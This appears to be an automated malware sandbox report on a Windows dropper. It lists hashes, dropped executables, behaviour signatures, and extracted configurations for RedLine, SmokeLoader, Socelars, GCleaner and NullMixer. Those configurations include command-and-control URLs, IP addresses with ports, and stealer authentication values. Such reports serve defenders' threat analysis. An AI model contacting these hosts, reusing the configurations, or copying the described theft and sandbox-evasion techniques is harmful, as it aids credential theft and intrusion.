Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
03-04-2024 19:37
Static task
static1
Behavioral task
behavioral1
Sample
a4d23ac3c7172b9aa02e35b6bf0fd21f_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
a4d23ac3c7172b9aa02e35b6bf0fd21f_JaffaCakes118.exe
Resource
win10v2004-20240226-en
General
-
Target
a4d23ac3c7172b9aa02e35b6bf0fd21f_JaffaCakes118.exe
-
Size
3.9MB
-
MD5
a4d23ac3c7172b9aa02e35b6bf0fd21f
-
SHA1
0326aab7deddfefc048c9a67ac9ce4ee14ea9003
-
SHA256
9bd142ecfe89857de80bb3255a1655f680ca6451b45cca235096dc1c1285e806
-
SHA512
9e425d8a1beaeabfc983bb75a7a5f8a8c0823e825e9f66e17b0f515b2897da9f2d9b2f1aa9939fdbae6c826c2c730d3bc772abec9e35a61d3d73a6cdb87ddf10
-
SSDEEP
98304:JwOLAdLUm3WFTzOzZfkT2Ribt7xkk49JBLHInas2Xzr+:JwOcN3mWZfkTIibtik4honas6y
Malware Config
Extracted
nullmixer
http://hsiens.xyz/
Extracted
socelars
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.znsjis.top/
Extracted
redline
she
135.181.129.119:4805
-
auth_value
b69102cdbd4afe2d3159f88fb6dac731
Extracted
gcleaner
ggg-cl.biz
45.9.20.13
Extracted
smokeloader
pub5
Extracted
smokeloader
2020
http://gmpeople.com/upload/
http://mile48.com/upload/
http://lecanardstsornin.com/upload/
http://m3600.com/upload/
http://camasirx.com/upload/
Extracted
redline
ANI
45.142.215.47:27643
-
auth_value
9491a1c5e11eb6097e68a4fa8627fda8
Signatures
-
Detect Fabookie payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS4D90E546\Sun152bea652bd7232.exe family_fabookie -
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 5 IoCs
Processes:
resource yara_rule behavioral1/memory/1188-156-0x00000000017F0000-0x0000000001814000-memory.dmp family_redline behavioral1/memory/1188-176-0x0000000001810000-0x0000000001832000-memory.dmp family_redline behavioral1/memory/936-388-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/936-386-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/936-392-0x0000000000400000-0x0000000000422000-memory.dmp family_redline -
SectopRAT payload 5 IoCs
Processes:
resource yara_rule behavioral1/memory/1188-156-0x00000000017F0000-0x0000000001814000-memory.dmp family_sectoprat behavioral1/memory/1188-176-0x0000000001810000-0x0000000001832000-memory.dmp family_sectoprat behavioral1/memory/936-388-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral1/memory/936-386-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral1/memory/936-392-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS4D90E546\Sun15901f2f025e.exe family_socelars -
OnlyLogger payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/1404-207-0x0000000000320000-0x0000000000368000-memory.dmp family_onlylogger behavioral1/memory/1404-227-0x0000000000400000-0x00000000016E0000-memory.dmp family_onlylogger behavioral1/memory/1404-442-0x0000000000400000-0x00000000016E0000-memory.dmp family_onlylogger -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS4D90E546\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS4D90E546\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS4D90E546\libstdc++-6.dll aspack_v212_v242 -
Executes dropped EXE 17 IoCs
Processes:
setup_installer.exesetup_install.exeSun15dbd675f871ca.exeSun152bab5a2de.exeSun159ff1acacf.exeSun15f67075f27a2b5b.exeSun152bea652bd7232.exeSun158d8ef840.exeSun1577c3e159a3e3815.exeSun15901f2f025e.exeSun152e52d07b74d9b5.exeSun15f1b1f8c669.exeSun1507db358fce61c0b.exe09xU.exESun159ff1acacf.exeSun159ff1acacf.execubhhwhpid process 2516 setup_installer.exe 2412 setup_install.exe 2760 Sun15dbd675f871ca.exe 1528 Sun152bab5a2de.exe 1640 Sun159ff1acacf.exe 2020 Sun15f67075f27a2b5b.exe 2160 Sun152bea652bd7232.exe 2084 Sun158d8ef840.exe 1404 Sun1577c3e159a3e3815.exe 1760 Sun15901f2f025e.exe 1744 Sun152e52d07b74d9b5.exe 1188 Sun15f1b1f8c669.exe 1784 Sun1507db358fce61c0b.exe 1464 09xU.exE 2452 Sun159ff1acacf.exe 936 Sun159ff1acacf.exe 2004 cubhhwh -
Loads dropped DLL 63 IoCs
Processes:
a4d23ac3c7172b9aa02e35b6bf0fd21f_JaffaCakes118.exesetup_installer.exesetup_install.execmd.execmd.execmd.exeSun15dbd675f871ca.execmd.exeSun152bab5a2de.execmd.execmd.exeSun159ff1acacf.execmd.execmd.execmd.execmd.execmd.exeSun158d8ef840.exeSun1577c3e159a3e3815.exeSun1507db358fce61c0b.exeSun15f1b1f8c669.exeSun15901f2f025e.execmd.exe09xU.exEWerFault.exerundll32.exeSun159ff1acacf.exerundll32.exepid process 2600 a4d23ac3c7172b9aa02e35b6bf0fd21f_JaffaCakes118.exe 2516 setup_installer.exe 2516 setup_installer.exe 2516 setup_installer.exe 2516 setup_installer.exe 2516 setup_installer.exe 2516 setup_installer.exe 2412 setup_install.exe 2412 setup_install.exe 2412 setup_install.exe 2412 setup_install.exe 2412 setup_install.exe 2412 setup_install.exe 2412 setup_install.exe 2412 setup_install.exe 1480 cmd.exe 1408 cmd.exe 1336 cmd.exe 1336 cmd.exe 2760 Sun15dbd675f871ca.exe 2760 Sun15dbd675f871ca.exe 1720 cmd.exe 1528 Sun152bab5a2de.exe 1528 Sun152bab5a2de.exe 1376 cmd.exe 1376 cmd.exe 1100 cmd.exe 1640 Sun159ff1acacf.exe 1640 Sun159ff1acacf.exe 2188 cmd.exe 816 cmd.exe 816 cmd.exe 2324 cmd.exe 2776 cmd.exe 2776 cmd.exe 840 cmd.exe 2084 Sun158d8ef840.exe 2084 Sun158d8ef840.exe 1404 Sun1577c3e159a3e3815.exe 1404 Sun1577c3e159a3e3815.exe 1784 Sun1507db358fce61c0b.exe 1784 Sun1507db358fce61c0b.exe 1188 Sun15f1b1f8c669.exe 1188 Sun15f1b1f8c669.exe 1760 Sun15901f2f025e.exe 1760 Sun15901f2f025e.exe 932 cmd.exe 1464 09xU.exE 1464 09xU.exE 1728 WerFault.exe 1728 WerFault.exe 1728 WerFault.exe 1728 WerFault.exe 1640 Sun159ff1acacf.exe 2764 rundll32.exe 2764 rundll32.exe 2764 rundll32.exe 1640 Sun159ff1acacf.exe 936 Sun159ff1acacf.exe 936 Sun159ff1acacf.exe 2316 rundll32.exe 2316 rundll32.exe 2316 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
Processes:
flow ioc 29 iplogger.org 44 iplogger.org 48 iplogger.org 66 pastebin.com 67 pastebin.com 28 iplogger.org -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 16 ip-api.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
Sun159ff1acacf.exedescription pid process target process PID 1640 set thread context of 936 1640 Sun159ff1acacf.exe Sun159ff1acacf.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1728 2412 WerFault.exe setup_install.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
Sun1507db358fce61c0b.execubhhwhdescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun1507db358fce61c0b.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun1507db358fce61c0b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cubhhwh Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cubhhwh Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cubhhwh Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun1507db358fce61c0b.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 760 taskkill.exe 1724 taskkill.exe -
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Processes:
Sun15901f2f025e.exeSun15dbd675f871ca.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Sun15901f2f025e.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 Sun15901f2f025e.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Sun15901f2f025e.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 Sun15901f2f025e.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 Sun15901f2f025e.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 Sun15901f2f025e.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 Sun15901f2f025e.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 Sun15dbd675f871ca.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 Sun15dbd675f871ca.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 Sun15901f2f025e.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 Sun15901f2f025e.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
